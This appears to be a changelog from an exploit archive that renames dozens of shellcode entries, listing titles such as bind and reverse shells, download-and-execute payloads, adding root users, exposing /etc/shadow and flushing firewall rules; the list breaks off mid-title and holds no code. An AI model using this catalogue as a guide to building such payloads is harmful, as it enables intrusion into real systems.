
78 changes to exploits/shellcodes OBS studio 20.1.3 - Local Buffer Overflow OBS Studio 20.1.3 - Local Buffer Overflow Seagate Personal Cloud - Multiple Vulnerabilities AIX - execve /bin/sh Shellcode (88 bytes) AIX - execve(/bin/sh) Shellcode (88 bytes) BSD/PPC - execve /bin/sh Shellcode (128 bytes) BSD/x86 - setuid(0) + execve /bin/sh Shellcode (30 bytes) BSD/PPC - execve(/bin/sh) Shellcode (128 bytes) BSD/x86 - setuid(0) + execve(/bin/sh) Shellcode (30 bytes) BSD/x86 - execve /bin/sh Shellcode (27 bytes) BSD/x86 - execve /bin/sh + setuid(0) Shellcode (29 bytes) BSD/x86 - execve(/bin/sh) Shellcode (27 bytes) BSD/x86 - execve(/bin/sh) + setuid(0) Shellcode (29 bytes) BSD/x86 - execve /bin/sh Encoded Shellcode (49 bytes) BSD/x86 - execve /bin/sh Encoded Shellcode (57 bytes) BSD/x86 - execve(/bin/sh) Encoded Shellcode (49 bytes) BSD/x86 - execve(/bin/sh) + Encoded Shellcode (57 bytes) BSDi/x86 - execve /bin/sh Shellcode (45 bytes) BSDi/x86 - execve /bin/sh Shellcode (46 bytes) BSDi/x86 - execve /bin/sh ToUpper Encoded Shellcode (97 bytes) FreeBSD x86 / x64 - execve /bin/sh Anti-Debugging Shellcode (140 bytes) BSDi/x86 - execve(/bin/sh) Shellcode (45 bytes) BSDi/x86 - execve(/bin/sh) Shellcode (46 bytes) BSDi/x86 - execve(/bin/sh) ToUpper Encoded Shellcode (97 bytes) FreeBSD x86 / x64 - execve(/bin/sh) Anti-Debugging Shellcode (140 bytes) FreeBSD/x86 - execve /bin/cat /etc/master.passwd Null-Free Shellcode (65 bytes) FreeBSD/x86 - execve(/bin/cat /etc/master.passwd) Null-Free Shellcode (65 bytes) FreeBSD/x86 - execve /bin/sh Encoded Shellcode (48 bytes) FreeBSD/x86 - execve(/bin/sh) Encoded Shellcode (48 bytes) FreeBSD/x86 - execve /bin/sh Shellcode (23 bytes) (1) FreeBSD/x86 - execve /bin/sh Shellcode (23 bytes) (2) FreeBSD/x86 - execve /bin/sh Shellcode (37 bytes) FreeBSD/x86 - execve(/bin/sh) Shellcode (23 bytes) (1) FreeBSD/x86 - execve(/bin/sh) Shellcode (23 bytes) (2) FreeBSD/x86 - execve(/bin/sh) Shellcode (37 bytes) FreeBSD/x86 - chown 0:0 + chmod 6755 + execve 
/tmp/sh Shellcode (44 bytes) FreeBSD/x86 - execve /tmp/sh Shellcode (34 bytes) FreeBSD/x86 - chown 0:0 + chmod 6755 + execve(/tmp/sh) Shellcode (44 bytes) FreeBSD/x86 - execve(/tmp/sh) Shellcode (34 bytes) FreeBSD/x86-64 - execve /bin/sh Shellcode (34 bytes) Linux/x86 - execve Null-Free Shellcode (Generator) FreeBSD/x86-64 - execve(/bin/sh) Shellcode (34 bytes) Linux/x86 - execve() Null-Free Shellcode (Generator) Linux - execve /bin/sh Polymorphic With Printable ASCII Characters Shellcode (Generator) Linux - execve(/bin/sh) + Polymorphic + Printable ASCII Characters Shellcode (Generator) HP-UX - execve /bin/sh Shellcode (58 bytes) HP-UX - execve(/bin/sh) Shellcode (58 bytes) Linux/PPC - execve /bin/sh Shellcode (60 bytes) Linux/PPC - execve(/bin/sh) Shellcode (60 bytes) Linux/PPC - execve /bin/sh Shellcode (112 bytes) Linux/PPC - execve(/bin/sh) Shellcode (112 bytes) Linux/x86 - Self-Modifying Anti-IDS /bin/sh Shellcode (35/64 bytes) Linux/x86 - /bin/sh + Self-Modifying Anti-IDS Shellcode (35/64 bytes) Linux/x86 - Disable Network Card Polymorphic Shellcode (75 bytes) Linux/x86 - killall5 Polymorphic Shellcode (61 bytes) Linux/x86 - execve /bin/sh Polymorphic Shellcode (48 bytes) Linux/x86 - Disable Network Card + Polymorphic Shellcode (75 bytes) Linux/x86 - killall5 + Polymorphic Shellcode (61 bytes) Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (48 bytes) Linux/x86 - reboot() Polymorphic Shellcode (57 bytes) Linux/x86 - chmod 666 /etc/shadow Polymorphic Shellcode (54 bytes) Linux/x86 - reboot() + Polymorphic Shellcode (57 bytes) Linux/x86 - chmod 666 /etc/shadow + Polymorphic Shellcode (54 bytes) Linux/x86 - execve read Shellcode (92 bytes) Linux/x86 - execve() Read Shellcode (92 bytes) Linux/x86 - setuid(0) + execve /bin/sh Shellcode (28 bytes) Linux/x86 - execve /bin/sh Shellcode (22 bytes) Linux/x86 - setuid(0) + execve(/bin/sh) Shellcode (28 bytes) Linux/x86 - execve(/bin/sh) Shellcode (22 bytes) Linux/x86 - execve /bin/sh (Re-Use Of Strings In .rodata) 
Shellcode (16 bytes) Linux/x86 - execve(/bin/sh) (Re-Use Of Strings In .rodata) Shellcode (16 bytes) Linux/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) + setuid Shellcode (96 bytes) Linux/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) + setuid() Shellcode (96 bytes) Linux/x86 - execve Diassembly Obfuscation Shellcode (32 bytes) Linux/x86 - execve() Diassembly Obfuscation Shellcode (32 bytes) Linux/x86 - execve /bin/sh Shellcode (24 bytes) (2) Linux/x86 - execve(/bin/sh) Shellcode (24 bytes) (2) Linux/x86 - execve /bin/sh + '.ZIP' Header Shellcode (28 bytes) Linux/x86 - execve /bin/sh + '.RTF' Header Shellcode (30 bytes) Linux/x86 - execve /bin/sh + '.RIFF' Header Shellcode (28 bytes) Linux/x86 - execve /bin/sh + '.BMP' Bitmap Header Shellcode (27 bytes) Linux/x86 - execve(/bin/sh) + '.ZIP' Header Shellcode (28 bytes) Linux/x86 - execve(/bin/sh) + '.RTF' Header Shellcode (30 bytes) Linux/x86 - execve(/bin/sh) + '.RIFF' Header Shellcode (28 bytes) Linux/x86 - execve(/bin/sh) + '.BMP' Bitmap Header Shellcode (27 bytes) Linux/x86 - execve /bin/sh Anti-IDS Shellcode (40 bytes) Linux/x86 (Intel x86 CPUID) - execve /bin/sh XORED Encoded Shellcode (41 bytes) Linux/x86 - execve /bin/sh Shellcode +1 Encoded (39 bytes) Linux/x86 - execve(/bin/sh) + Anti-IDS Shellcode (40 bytes) Linux/x86 (Intel x86 CPUID) - execve(/bin/sh) XORED Encoded Shellcode (41 bytes) Linux/x86 - execve(/bin/sh) Shellcode +1 Encoded (39 bytes) Linux/x86 - Anti-Debug Trick (INT 3h trap) + execve /bin/sh Shellcode (39 bytes) Linux/x86 - Anti-Debug Trick (INT 3h trap) + execve(/bin/sh) Shellcode (39 bytes) Linux/x86 - setreuid(0_ 0) + execve /bin/sh Shellcode (31 bytes) Linux/x86 - execve /bin/sh + PUSH Shellcode (23 bytes) Linux/x86 - setreuid(0_ 0) + execve(/bin/sh) Shellcode (31 bytes) Linux/x86 - execve(/bin/sh) + PUSH Shellcode (23 bytes) Linux/x86 - execve /bin/sh Standard Opcode Array Payload Shellcode (21 bytes) Linux/x86 - execve(/bin/sh) Standard Opcode Array Payload Shellcode (21 bytes) Linux/x86 - 
execve /bin/sh sysenter Opcode Array Payload Shellcode (23 bytes) Linux/x86 - execve /bin/sh sysenter Opcode Array Payload Shellcode (27 bytes) Linux/x86 - execve /bin/sh sysenter Opcode Array Payload Shellcode (45 bytes) Linux/x86 - Break chroot (../ 20x Loop) + execve /bin/sh Shellcode (66 bytes) Linux/x86 - execve(/bin/sh) sysenter Opcode Array Payload Shellcode (23 bytes) Linux/x86 - execve(/bin/sh) sysenter Opcode Array Payload Shellcode (27 bytes) Linux/x86 - execve(/bin/sh) sysenter Opcode Array Payload Shellcode (45 bytes) Linux/x86 - Break chroot (../ 20x Loop) + execve(/bin/sh) Shellcode (66 bytes) Linux/x86 - setreuid + execve Shellcode (31 bytes) Linux/x86 - setreuid() + execve() Shellcode (31 bytes) Linux/x86 - execve code Shellcode (23 bytes) Linux/x86 - execve() Shellcode (23 bytes) Linux/x86 - execve /bin/sh Alphanumeric Shellcode (392 bytes) Linux/IA32 - execve /bin/sh 0xff-Free Shellcode (45 bytes) Linux/x86 - symlink /bin/sh xoring Shellcode (56 bytes) Linux/x86 - execve(/bin/sh) Alphanumeric Shellcode (392 bytes) Linux/IA32 - execve(/bin/sh) 0xff-Free Shellcode (45 bytes) BSD/x86 - symlink /bin/sh + XORing Encoded Shellcode (56 bytes) Linux/x86 - Add Root User (t00r) Anti-IDS Shellcode (116 bytes) Linux/x86 - chmod 666 /etc/shadow Anti-IDS Shellcode (75 bytes) Linux/x86 - symlink . /bin/sh Shellcode (32 bytes) Linux/x86 - Add Root User (t00r) + Anti-IDS Shellcode (116 bytes) Linux/x86 - chmod 666 /etc/shadow + Anti-IDS Shellcode (75 bytes) BSD/x86 - symlink . 
/bin/sh Shellcode (32 bytes) Linux/x86 - execve /bin/sh Shellcode (29 bytes) Linux/x86 - execve /bin/sh Shellcode (24 bytes) (3) Linux/x86 - execve /bin/sh Shellcode (38 bytes) Linux/x86 - execve /bin/sh Shellcode (30 bytes) Linux/x86 - execve /bin/sh + setreuid(12_12) Shellcode (50 bytes) Linux/x86 - execve(/bin/sh) Shellcode (29 bytes) Linux/x86 - execve(/bin/sh) Shellcode (24 bytes) (3) Linux/x86 - execve(/bin/sh) Shellcode (38 bytes) Linux/x86 - execve(/bin/sh) Shellcode (30 bytes) Linux/x86 - execve(/bin/sh) + setreuid(12_12) Shellcode (50 bytes) Linux/x86 - Break chroot (../ 10x Loop) Shellcode (34 bytes) Linux/x86 - Break chroot (../ 10x Loop) Shellcode (46 bytes) Linux/x86 - Break chroot + execve /bin/sh Shellcode (80 bytes) Linux/x86 - execve /bin/sh Anti-IDS Shellcode (58 bytes) Linux/x86 - execve /bin/sh XOR Encoded Shellcode (55 bytes) Linux/x86 - execve /bin/sh ToLower Encoded Shellcode (41 bytes) Linux/x86 - setreuid(0_0) + execve /bin/sh Shellcode (46+ bytes) Linux/x86 - execve /bin/sh ToLower Encoded Shellcode (55 bytes) Linux/x86 - Break chroot (../ 10x Loop) Shellcode (28 bytes) OpenBSD/x86 - Load Kernel Module (/tmp/o.o) Shellcode (66 bytes) BSD/x86 - setuid(0) + Break chroot (../ 10x Loop) Shellcode (46 bytes) Linux/x86 - Break chroot + execve(/bin/sh) Shellcode (80 bytes) Linux/x86 - execve(/bin/sh) + Anti-IDS Shellcode (58 bytes) Linux/x86 - execve(/bin/sh) XOR Encoded Shellcode (55 bytes) Linux/x86 - execve(/bin/sh) ToLower Encoded Shellcode (41 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/sh) Shellcode (46+ bytes) Linux/x86 - execve(/bin/sh) ToLower Encoded Shellcode (55 bytes) Linux/x86 - setreuid(0_ 0) + Break chroot (mkdir/chdir/chroot _../_) + execve /bin/sh Shellcode (132 bytes) Linux/x86 - setreuid(0_ 0) + Break chroot (mkdir/chdir/chroot _../_) + execve(/bin/sh) Shellcode (132 bytes) Linux/x86-64 - execve /bin/sh Shellcode (33 bytes) Linux/x86-64 - execve(/bin/sh) Shellcode (33 bytes) Linux/x86 / Unix/SPARC / IRIX/MIPS - execve 
/bin/sh Shellcode (141 bytes) Linux/x86 / Unix/SPARC - execve /bin/sh Shellcode (80 bytes) BSD/x86 / Linux/x86 - execve /bin/sh Shellcode (38 bytes) Linux/x86 / Unix/SPARC / IRIX/MIPS - execve(/bin/sh) Shellcode (141 bytes) Linux/x86 / Unix/SPARC - execve(/bin/sh) Shellcode (80 bytes) BSD/x86 / Linux/x86 - execve(/bin/sh) Shellcode (38 bytes) NetBSD/x86 - execve /bin/sh Shellcode (68 bytes) OpenBSD/x86 - execve /bin/sh Shellcode (23 bytes) NetBSD/x86 - execve(/bin/sh) Shellcode (68 bytes) OpenBSD/x86 - execve(/bin/sh) Shellcode (23 bytes) OSX/PPC - execve /bin/sh Shellcode (72 bytes) OSX/PPC - execve(/bin/sh) Shellcode (72 bytes) OSX/PPC - setuid(0) + execve /bin/sh Shellcode (88 bytes) OSX/PPC - setuid(0) + execve(/bin/sh) Shellcode (88 bytes) OSX/PPC - execve /usr/X11R6/bin/xterm Shellcode (141 bytes) OSX/PPC - execve(/usr/X11R6/bin/xterm) Shellcode (141 bytes) Solaris/SPARC - Download File (http://evil-dl/) + Execute (/tmp/ff) Shellcode (278 bytes) Solaris/MIPS - Download (http://10.1.1.2:80/evil-dl) + Execute (/tmp/ff) Shellcode (278 bytes) Solaris/SPARC - Reverse TCP (44434/TCP) Shell + XNOR Encoded Shellcode (600 bytes) (Generator) Solaris/SPARC - setreuid + execve Shellcode (56 bytes) Solaris/MIPS - Reverse TCP (10.0.0.3:44434/TCP) Shell + XNOR Encoded Traffic Shellcode (600 bytes) (Generator) Solaris/SPARC - setreuid + execve() Shellcode (56 bytes) Solaris/SPARC - execve /bin/sh Shellcode (52 bytes) Solaris/SPARC - Bind TCP (6789/TCP) Shell (/bin/sh) Shellcode (228 bytes) Solaris/SPARC - Reverse TCP (192.168.1.4:5678/TCP) Shell (/bin/sh) Shellcode (204 bytes) Solaris/SPARC - execve(/bin/sh) Shellcode (52 bytes) Solaris/SPARC - Bind TCP (6789/TCP) Shell (/bin/sh) Shellcode (228 bytes) Solaris/SPARC - Reverse TCP (192.168.1.4:5678/TCP) Shell (/bin/sh) Shellcode (204 bytes) Solaris/x86 - setuid(0) + execve(//bin/sh) + exit(0) Null-Free Shellcode (39 bytes) Solaris/x86 - setuid(0) + execve(/bin/sh) + exit(0) Null-Free Shellcode (39 bytes) Solaris/x86 - execve 
/bin/sh ToUpper Encoded Shellcode (84 bytes) Solaris/x86 - inetd Add Service + execve Shellcode (201 bytes) UnixWare - execve /bin/sh Shellcode (95 bytes) Solaris/x86 - execve(/bin/sh) ToUpper Encoded Shellcode (84 bytes) Solaris/x86 - inetd Add Service + execve() Shellcode (201 bytes) UnixWare - execve(/bin/sh) Shellcode (95 bytes) Linux/x86 - execve Shellcode (51 bytes) Linux/x86 - execve() Shellcode (51 bytes) Linux/x86 - setuid + Break chroot (mkdir/chdir/chroot '...') + execve /bin/sh Shellcode (79 bytes) Linux/x86 - setuid() + Break chroot (mkdir/chdir/chroot '...') + execve(/bin/sh) Shellcode (79 bytes) Linux/x86 - ip6tables -F Polymorphic Shellcode (71 bytes) Linux/x86 - ip6tables -F + Polymorphic Shellcode (71 bytes) Linux/x86 - execve /bin/cat /etc/passwd Shellcode (43 bytes) Linux/x86 - execve(/bin/cat /etc/passwd) Shellcode (43 bytes) Linux/x86 - execve /bin/sh Shellcode (8 bytes) Linux/x86 - execve /bin/sh Shellcode (21 bytes) (2) Linux/x86 - execve(/bin/sh) Shellcode (8 bytes) Linux/x86 - execve(/bin/sh) Shellcode (21 bytes) (2) Linux/x86-64 - execve /bin/sh Shellcode (25 bytes) (2) Linux/x86 - execve(/bin/sh) Shellcode (25 bytes) (2) Linux/x86 - Fork Bomb Polymorphic Shellcode (30 bytes) Linux/x86 - Fork Bomb + Polymorphic Shellcode (30 bytes) Linux/x86-64 - execve /bin/sh Shellcode (30 bytes) Linux/x86-64 - execve(/bin/sh) Shellcode (30 bytes) Linux/x86 - execve(_/bin/bash___-p__NULL) Polymorphic Shellcode (57 bytes) Linux/x86 - execve(_/bin/bash___-p__NULL) + Polymorphic Shellcode (57 bytes) Linux/x86 - setuid(0) + chmod 0666 /etc/shadow Polymorphic Shellcode (61 bytes) Linux/x86 - setuid(0) + chmod 0666 /etc/shadow + Polymorphic Shellcode (61 bytes) Linux/x86 - sys_setuid(0) + sys_setgid(0) + execve (_/bin/sh_) Shellcode (39 bytes) Linux/x86 - sys_setuid(0) + sys_setgid(0) + execve(_/bin/sh_) Shellcode (39 bytes) Linux/x86 - execve /bin/sh Polymorphic Shellcode (116 bytes) Linux/ARM - chmod 0777 /etc/shadow Polymorphic Shellcode (84 bytes) 
Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (116 bytes) Linux/ARM - chmod 0777 /etc/shadow + Polymorphic Shellcode (84 bytes) Linux/ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) XOR 88 Encoded Polymorphic Shellcode (78 bytes) Linux/ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) + XOR 88 Encoded + Polymorphic Shellcode (78 bytes) Linux - Write SUID Root Shell (/tmp/.hiddenshell) Polymorphic Shellcode (161 bytes) Linux - Write SUID Root Shell (/tmp/.hiddenshell) + Polymorphic Shellcode (161 bytes) Linux - Bind TCP (6778/TCP) Shell + XOR Encoded Polymorphic Shellcode (125 bytes) Linux/x86 - Bind TCP (6778/TCP) Shell + XOR Encoded + Polymorphic Shellcode (125 bytes) Linux/ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) Polymorphic Shellcode (Generator) Linux - Find All Writeable Folder In FileSystem Polymorphic Shellcode (91 bytes) Linux/ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) + Polymorphic Shellcode (Generator) Linux/x86 - Find All Writeable Folder In FileSystem + Polymorphic Shellcode (91 bytes) Linux/x86-64 - execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL) Shellcode (49 bytes) Linux/x86-64 - Flush IPTables Rules (execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL)) Shellcode (49 bytes) Linux/x86 - execve /bin/sh Polymorphic Null-Free Shellcode (46 bytes) Linux/x86 - execve(/bin/sh) + Polymorphic Null-Free Shellcode (46 bytes) Windows Mobile 6.5 TR (WinCE 5.2) - MessageBox Shellcode (ARM) Windows Mobile 6.5 TR (WinCE 5.2)/ARM - MessageBox Shellcode OSX/Intel x86-64 - setuid shell Shellcode (51 bytes) OSX/x86-64 - setuid() + Shell(/bin/sh) Shellcode (51 bytes) Linux/x86 - Bind TCP (6666/TCP) Netcat (/usr/bin/netcat) Shell (/bin/sh) + Polymorphic XOR Encoded Shellcode (69/93 bytes) OSX/Intel x86-64 - Reverse TCP (FFFFFFFF:4444/TCP) Shell (/bin/sh) Shellcode (131 bytes) Linux/x86 - Bind TCP (6666/TCP) Netcat (/usr/bin/netcat) Shell (/bin/sh) + Polymorphic + XOR Encoded Shellcode (69/93 bytes) OSX/x86-64 - Reverse TCP (FFFFFFFF:4444/TCP) Shell (/bin/sh) 
Shellcode (131 bytes) OSX - Universal ROP + Reverse TCP Shell Shellcode Linux/MIPS - execve /bin/sh Shellcode (52 bytes) OSX/x86-64 - Universal ROP + Reverse TCP Shell Shellcode Linux/MIPS - execve(/bin/sh) Shellcode (52 bytes) Linux/MIPS - execve /bin/sh Shellcode (48 bytes) Linux/MIPS - execve(/bin/sh) Shellcode (48 bytes) Linux/x86-64 - execve /bin/sh Shellcode (52 bytes) Linux/x86-64 - execve(/bin/sh) Shellcode (52 bytes) Linux/x86 - setuid(0) + setgid(0) + Add Root User (iph) To /etc/passwd Polymorphic Shellcode Linux/x86 - setuid(0) + setgid(0) + Add Root User (iph) To /etc/passwd + Polymorphic Shellcode Linux/x86 - execve /bin/dash Shellcode (42 bytes) Linux/x86 - execve(/bin/dash) Shellcode (42 bytes) Linux/x86 - execve /bin/sh + Socket Re-Use Shellcode (50 bytes) Linux/x86 - execve(/bin/sh) + Socket Re-Use Shellcode (50 bytes) Linux/MIPS - execve /bin/sh Shellcode (36 bytes) Linux/MIPS - execve(/bin/sh) Shellcode (36 bytes) Linux/x86 - execve /bin/sh ROT13 Encoded Shellcode (68 bytes) Linux/x86 - execve(/bin/sh) ROT13 Encoded Shellcode (68 bytes) Linux/x86 - execve /bin/sh Obfuscated Shellcode (40 bytes) Linux/x86 - execve(/bin/sh) Obfuscated Shellcode (40 bytes) Linux/x86 - execve /bin/sh Shellcode (35 bytes) Linux/x86 - execve(/bin/sh) Shellcode (35 bytes) Linux/x86 - Custom execve Shellcode (Encoder/Decoder) (Generator) Linux/x86 - execve /bin/sh (Push Method) Shellcode (21 bytes) Linux/x86-64 - execve /bin/sh Via Push Shellcode (23 bytes) Linux/x86 - 'Followtheleader' Custom execve() Shellcode (Encoder/Decoder) (Generator) Linux/x86 - execve(/bin/sh) (Push Method) Shellcode (21 bytes) Linux/x86-64 - execve(/bin/sh) Via Push Shellcode (23 bytes) Linux/x86 - execve /bin/sh Shellcode (26 bytes) Linux/x86 - execve /bin/sh Shellcode (21 bytes) (1) Linux/x86 - execve(/bin/sh) Shellcode (26 bytes) Linux/x86 - execve(/bin/sh) Shellcode (21 bytes) (1) Linux/x86-64 - execve /bin/sh Null-Free Shellcode (30 bytes) Linux/x86-64 - execve(/bin/sh) Null-Free Shellcode 
(30 bytes) Linux/x86 - execve /bin/sh Shellcode (23 bytes) Linux/x86 - execve(/bin/sh) Shellcode (23 bytes) Linux/x86-64 - execve Encoded Shellcode (57 bytes) Linux/x86 - execve /bin/sh ROT7 Encoded Shellcode Linux/x86-64 - execve() Encoded Shellcode (57 bytes) Linux/x86 - execve(/bin/sh) ROT7 Encoded Shellcode Linux/x86 - execve /bin/sh ROL/ROR Encoded Shellcode Linux/x86 - execve(/bin/sh) ROL/ROR Encoded Shellcode OSX/x86-64 - execve /bin/sh Null-Free Shellcode (34 bytes) OSX/x86-64 - execve(/bin/sh) Null-Free Shellcode (34 bytes) Linux/x86 - execve /bin/bash Shellcode (31 bytes) Linux/x86 - execve(/bin/bash) Shellcode (31 bytes) Linux/x86-64 - execve /bin/sh Shellcode (34 bytes) Linux/x86-64 - execve(/bin/sh) Shellcode (34 bytes) Linux/x86-64 - execve Shellcode (22 bytes) Linux/x86-64 - execve() Shellcode (22 bytes) Linux/x86-64 - execve Polymorphic Shellcode (31 bytes) Linux/x86-64 - execve() + Polymorphic Shellcode (31 bytes) Linux/x86 - execve /bin/sh Shellcode (24 bytes) (1) Linux/x86 - execve(/bin/sh) Shellcode (24 bytes) (1) Linux/x86-64 - execve XOR/NOT/DIV Encoded Shellcode (54 bytes) Linux/x86-64 - execve() XOR/NOT/DIV Encoded Shellcode (54 bytes) Linux/x86-64 - execve Stack Polymorphic Shellcode (47 bytes) Linux/x86-64 - execve() Stack + Polymorphic Shellcode (47 bytes) Linux/x86-64 - execve /bin/sh Shellcode (26 bytes) Linux/x86-64 - execve /bin/sh Shellcode (25 bytes) (1) Linux/x86-64 - execve /bin/bash Shellcode (33 bytes) Linux/x86-64 - execve(/bin/sh) Shellcode (26 bytes) Linux/x86-64 - execve(/bin/sh) Shellcode (25 bytes) (1) Linux/x86-64 - execve(/bin/bash) Shellcode (33 bytes) Linux/x86-64 - execve XOR Encoded Shellcode (84 bytes) Linux/x86-64 - execve() XOR Encoded Shellcode (84 bytes) Linux/x86 - execve /bin/sh + ASLR Bruteforce Shellcode Linux/x86 - execve(/bin/sh) + ASLR Bruteforce Shellcode Linux/x86 - execve /bin/sh Shellcode (19 bytes) Linux/x86 - execve(/bin/sh) Shellcode (19 bytes) OSX/PPC - Remote findsock by recv() Key Shellcode 
OSX/PPC - Reverse TCP Shell (/bin/csh) Shellcode OSX/PPC - Stager Sock Find MSG_PEEK Shellcode OSX/PPC - Stager Sock Find Shellcode OSX/PPC - Stager Sock Reverse Shellcode OSX/PPC - Bind TCP (8000/TCP) Shell + OSXPPCLongXOR Encoded Shellcode (300 bytes) OSX/PPC - execve(/bin/sh) Shellcode OSX/PPC - execve(/bin/sh_[/bin/sh]_NULL) + exit() Shellcode (72 bytes) OSX/x86 - execve(/bin/sh) Shellcode (24 bytes) Linux/x86 - Add User (t00r/t00r) PexFnstenvSub Encoded Shellcode (116 bytes) BSD/x86 - setuid(0) + Break chroot (../ 10x Loop) + execute /bin/sh Shellcode (57 bytes) BSD/x86 - setuid(0) + Break chroot (../ 10x Loop) + Bind TCP (2222/TCP) Shell Shellcode (133 bytes) BSD/x86 - Bind TCP (2222/TCP) Shell Shellcode (100 bytes) Linux/x86 - setuid(0) + Load Kernel Module (/tmp/o.o) Shellcode (67 bytes) Linux/x86 - setuid(0) + Break chroot (../ 10x Loop) Shellcode (34 bytes) Solaris/SPARC - setreuid(geteuid()) + setregid(getegid()) + execve(/bin/sh) Shellcode Solaris/SPARC - Bind TCP (2001/TCP) Shell (/bin/sh) Shellcode Solaris/SPARC - Bind TCP Shell Shellcode Solaris/x86 - setuid(0) + /bin/cat /etc/shadow Shellcode (61 bytes) Solaris/x86 - execve(/bin/sh) Shellcode (43 bytes) BSD/x86 - setuid(0) + Break chroot (../ 10x Loop) Shellcode (34 bytes) OpenBSD/x86 - setuid(0) + Load Kernel Module (/tmp/o.o) Shellcode (74 bytes) BSD/x86 - Break chroot (../ 10x Loop) Shellcode (28 bytes) BSD/x86 - Break chroot (../ 10x Loop) Shellcode (40 bytes) Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) + exit() Shellcode (58 bytes) Linux/x86 - Flush IPChains Rules (/sbin/ipchains -F) + exit() Shellcode (64 bytes) Linux/x86 - Flush IPChains Rules (/sbin/ipchains -F) Shellcode (58 bytes) BSD/x86 - symlink /bin/sh sh Shellcode (39 bytes) Linux/x86 - symlink /bin/sh sh Shellcode (36 bytes) BSD/x86 - Write to /etc/passwd with uid(0) + gid(0) Shellcode (74 bytes) Linux/x86 - Write to /etc/passwd with uid(0) + gid(0) Shellcode (74 bytes) BSD/x86 - execve(/bin/sh) + seteuid(0) Shellcode (31 
bytes) BSD/x86 - execve(/bin/sh) Shellcode (28 bytes) Linux/x86 - Bind TCP (3879/TCP) Shell (/bin/sh) Shellcode (113 bytes) Linux/x86 - Add Root User (w00w00) To /etc/passwd Shellcode (104 bytes) Linux/x86 - Disable Shadowing Shellcode (42 bytes) Linux/x86 - setuid(0) + execve(/bin/sh) Shellcode (27 bytes) Linux/x86 - exit(0) / exit(1) Shellcode (3/4 bytes) Linux/x86 - setuid(0) + execve(/bin/sh_0) Shellcode (25 bytes) Linux/x86 - setuid(0) + setgid(0) + execve(/bin/sh_[/bin/sh_NULL])) Shellcode (25 bytes) Linux/x86 - execve(/sbin/shutdown_/sbin/shutdown 0) Shellcode (36 bytes) Linux/x86 - execve(/sbin/reboot_/sbin/reboot) Shellcode (28 bytes) Linux/x86 - execve(/sbin/halt_/sbin/halt) Shellcode (27 bytes) Linux/x86 - Bind TCP (64713/TCP) Shell (/bin/sh) Shellcode (83 bytes) Linux/x86 - setuid(0) + execve(_/bin/sh__0_0) Shellcode (28 bytes) Linux/x86 - execve(/bin/sh_0_0) Shellcode (21 bytes) Linux/x86 - fork() + setreuid(0_ 0) + execve(cp /bin/sh /tmp/sh; chmod 4755 /tmp/sh) Shellcode (126 bytes) Linux/x86 - Audio (knock knock knock) via /dev/dsp + setreuid(0_0) + execve() Shellcode (566 bytes) Linux/x86 - Add Root User (w000t) + No Password Shellcode (177 bytes) Linux/x86 - execve(/sbin/ipchains -F) Shellcode (70 bytes) Linux/x86 - execve(/sbin/iptables -F) Shellcode (70 bytes) Linux/x86-64 - execve /bin/sh -c reboot Shellcode (89 bytes) Linux/x86-64 - execve(/bin/sh) -c reboot Shellcode (89 bytes) Linux/x86 - execve /bin/bash -c Arbitrary Command Execution Null-Free Shellcode (72 bytes) Linux/x86 - execve(/bin/bash -c) Arbitrary Command Execution Null-Free Shellcode (72 bytes) Linux/x86-64 - execve /bin/sh Shellcode (22 bytes) Linux/x86-64 - execve(/bin/sh) Shellcode (22 bytes) Linux/x86-64 - setuid(0) + execve(/bin/sh) Polymorphic Shellcode (31 bytes) Linux/x86-64 - Flush IPTables Rules (/sbin/iptables -F) Polymorphic Shellcode (47 bytes) Linux/x86-64 - setuid(0) + execve(/bin/sh) + Polymorphic Shellcode (31 bytes) Linux/x86-64 - Flush IPTables Rules 
(/sbin/iptables -F) + Polymorphic Shellcode (47 bytes) Linux/x86-64 - Reverse Netcat Shell (127.0.0.1:1234) Polymorphic Shellcode (106 bytes) Linux/x86-64 - Reverse Netcat Shell (127.0.0.1:1234) + Polymorphic Shellcode (106 bytes) Linux/x86 - execve /bin/dash Shellcode (30 bytes) Linux/x86 - execve(/bin/dash) Shellcode (30 bytes) Linux/x86 - execve(/bin/sh) Polymorphic Shellcode (53 bytes) Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (53 bytes) FreeBSD/x86-64 - execve /bin/sh Shellcode (28 bytes) FreeBSD/x86-64 - execve(/bin/sh) Shellcode (28 bytes) FreeBSD/x86 - //sbin/pfctl -F all Shellcode (47 bytes) FreeBSD/x86 - /sbin/pfctl -F all Shellcode (47 bytes) FreeBSD - reboot() Shellcode (15 Bytes) FreeBSD/x86 - reboot() Shellcode (15 bytes) Linux/x86-64 - execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL) Shellcode (43 bytes) Linux/x86-64 - Flush IPTables Rules (execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL)) Shellcode (43 bytes) Linux/x86-64 - Add Root User (shell-storm/leet) Polymorphic Shellcode (273 bytes) Linux/x86-64 - Add Root User (shell-storm/leet) + Polymorphic Shellcode (273 bytes) Linux/x86-64 - execve /bin/sh Shellcode (21 bytes) Linux/x86 - execve /bin/sh Shellcode (21 bytes) Linux/x86-64 - execve(/bin/sh) Shellcode (21 bytes) Linux/x86 - execve(/bin/sh) Shellcode (21 bytes) Linux/x86-64 - execve /bin/sh Shellcode (31 bytes) (2) Linux/x86-64 - execve(/bin/sh) Shellcode (31 bytes) (2) Linux/x86-64 - execve /bin/sh Shellcode (31 bytes) (1) Linux/x86 - execve /bin/sh + setuid(0) + setgid(0) XOR Encoded Shellcode (66 bytes) Linux/x86-64 - execve /bin/sh Shellcode (24 bytes) Linux/x86-64 - execve(/bin/sh) Shellcode (31 bytes) (1) Linux/x86 - execve(/bin/sh) + setuid(0) + setgid(0) XOR Encoded Shellcode (66 bytes) Linux/x86-64 - execve(/bin/sh) Shellcode (24 bytes) Linux/x86 - execve /bin/sh Shellcode (24 bytes) Linux/x86 - execve(/bin/sh) Shellcode (24 